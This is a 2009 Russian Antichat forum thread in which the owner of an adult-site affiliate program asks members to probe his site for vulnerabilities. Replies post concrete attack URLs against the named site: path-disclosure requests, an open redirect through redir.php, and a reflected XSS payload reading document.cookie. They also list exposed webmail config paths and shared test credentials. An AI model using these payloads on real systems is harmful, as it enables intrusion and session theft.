ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Проверка на уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

adultseo.ru
  #1  
Старый 30.01.2009, 02:46
Аватар для Doom123
Doom123
Постоянный
Регистрация: 11.11.2006
Сообщений: 834
Провел на форуме:
3941248

Репутация: 668


Отправить сообщение для Doom123 с помощью ICQ
По умолчанию adultseo.ru

adultseo.ru Проверьте плиз сайт на уязвимости ...
партнёрк писал с 0 .... платник для неё

sexmalishki.ru

+5 тому кто хоть чтото найдёт =)
 
Ответить с цитированием

  #2  
Старый 30.01.2009, 10:12
Аватар для login999
login999
Постоянный
Регистрация: 12.06.2008
Сообщений: 654
Провел на форуме:
4512757

Репутация: 973


По умолчанию

зарегестрируйтесь - очипятка, должно быть "зарегистрируйтесь"
плюс в форме ввода немного уменьши длину поля для пароля, ато получается что Password на одной строчке, а : на другой
Переныкай админку, ато http://adultseo.ru/admin/ это как-то банально

Последний раз редактировалось login999; 30.01.2009 в 10:15..
 
Ответить с цитированием

  #3  
Старый 30.01.2009, 10:19
Аватар для Shadow_p1raT
Shadow_p1raT
Участник форума
Регистрация: 09.03.2008
Сообщений: 193
Провел на форуме:
2140897

Репутация: 267
Отправить сообщение для Shadow_p1raT с помощью ICQ
По умолчанию

Раскрытие путей
Код:
http://adultseo.ru/index.php?p[]=1
Код:
http://adultseo.ru/index.php?act=stat&site[]=

Последний раз редактировалось Shadow_p1raT; 30.01.2009 в 10:45..
 
Ответить с цитированием

  #4  
Старый 30.01.2009, 10:23
Аватар для login999
login999
Постоянный
Регистрация: 12.06.2008
Сообщений: 654
Провел на форуме:
4512757

Репутация: 973


По умолчанию

http://adultseo.ru/redir.php?text=%5C%5C'%D0%E5%E3%E8%F1%F2%F0%E0%F6% E8%FF+%EE%EA%EE%ED%F7%E5%ED%E0%21&to=index.php
При переходе видно, что включено экранирование кавычек слешами Кто шарит, может расковыряет
P.S. Для тех, кому лень регистрироваться логин: antichat, пароль antichat

Последний раз редактировалось login999; 30.01.2009 в 10:28..
 
Ответить с цитированием

  #5  
Старый 30.01.2009, 11:45
Аватар для [NiGHT]DarkAngel
[NiGHT]DarkAngel
Участник форума
Регистрация: 29.03.2005
Сообщений: 138
Провел на форуме:
812087

Репутация: 129
По умолчанию

http://adultseo.ru/index.php?act=stat&country[]=
http://adultseo.ru/redir.php?text=%C2%FB+%E2%EE%F8%EB%E8+%E2+%F1%E8%F 1%F2%E5%EC%F3%21&to[]=
- раскрытие путей

http://adultseo.ru/redir.php?text=%DF%20%E2%E7%EB%EE%EC%E0%EB%20%FD%F 2%EE%F2%20%F1%E0%E9%F2%20:-D&to[]=

Только что бы побаловаться

Последний раз редактировалось [NiGHT]DarkAngel; 30.01.2009 в 12:23..
 
Ответить с цитированием

  #6  
Старый 30.01.2009, 13:39
Аватар для -Hormold-
-Hormold-
Постоянный
Регистрация: 29.09.2007
Сообщений: 617
Провел на форуме:
3250478

Репутация: 999


Отправить сообщение для -Hormold- с помощью ICQ
По умолчанию

http://adultseo.ru/redir.php?text[]=%5C%5C%27%D0%E5%E3%E8%F1%F2%F0%E0%F6%%20E8%FF+%EE %EA%EE%ED%F7%E5%ED%E0%21&to=index.php
 
Ответить с цитированием

  #7  
Старый 30.01.2009, 13:48
Аватар для -Hormold-
-Hormold-
Постоянный
Регистрация: 29.09.2007
Сообщений: 617
Провел на форуме:
3250478

Репутация: 999


Отправить сообщение для -Hormold- с помощью ICQ
По умолчанию

ошибка на странице ссылки
там где реф ссылка у тебе ?act=reg
а должно быть ?page
 
Ответить с цитированием

  #8  
Старый 30.01.2009, 14:00
Аватар для Doom123
Doom123
Постоянный
Регистрация: 11.11.2006
Сообщений: 834
Провел на форуме:
3941248

Репутация: 668


Отправить сообщение для Doom123 с помощью ICQ
По умолчанию

login999 ммм а что там ковырять? .... нах те кавычка если там нет обращения к БД? а xss не выйдет т.к стоит htmlspecialchars

зы всем спасибо исправил .. а посерьёзней ничего нет?
 
Ответить с цитированием

  #9  
Старый 30.01.2009, 17:03
Аватар для login999
login999
Постоянный
Регистрация: 12.06.2008
Сообщений: 654
Провел на форуме:
4512757

Репутация: 973


По умолчанию

Цитата:
Сообщение от Doom123  
login999 ммм а что там ковырять? .... нах те кавычка если там нет обращения к БД? а xss не выйдет т.к стоит htmlspecialchars

зы всем спасибо исправил .. а посерьёзней ничего нет?
Кавычку сую тупо по привычке везде :)
А вот насчет той ссылочки, то смотри на вот такой прикол :
http://adultseo.ru/redir.php?text=%C0%20%F2%E5%EF%E5%F0%FC%20%EC%FB%2 0%E2%E0%F1%20%EE%F2%EF%F0%E0%E2%E8%EC%20%ED%E0%20% E8%F4%F0%E5%E9%EC,%20%E0%20%EC%EE%E6%E5%F2%20%E8%2 0%ED%E0%20%F4%E5%E9%EA,%20%FF%20%F2%EE%F7%ED%EE%20 %F5%E7;)&to=http://forum.devisible.ru

а потом подумай хорошенько :)

Последний раз редактировалось login999; 30.01.2009 в 17:34..
 
Ответить с цитированием

  #10  
Старый 30.01.2009, 19:55
Аватар для Maestus
Maestus
Новичок
Регистрация: 19.01.2009
Сообщений: 12
Провел на форуме:
236651

Репутация: 92
По умолчанию

Пассивная ХСС
Цитата:
http://adultseo.ru/webmail/index.php?lid=bg&f_email=%22%3E%3Cscript%3Ealert(d ocument.cookie)%3C/script%3E
открыты директории..
webmail/inc/
webmail/docs/

раскрытие путей
http://adultseo.ru/webmail/inc/inc.php
http://adultseo.ru/webmail/inc/class.uebimiau.php
http://adultseo.ru/webmail/inc/class.uebimiau_mail.php
http://adultseo.ru/webmail/inc/config.php

Последний раз редактировалось Maestus; 30.01.2009 в 19:59..
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ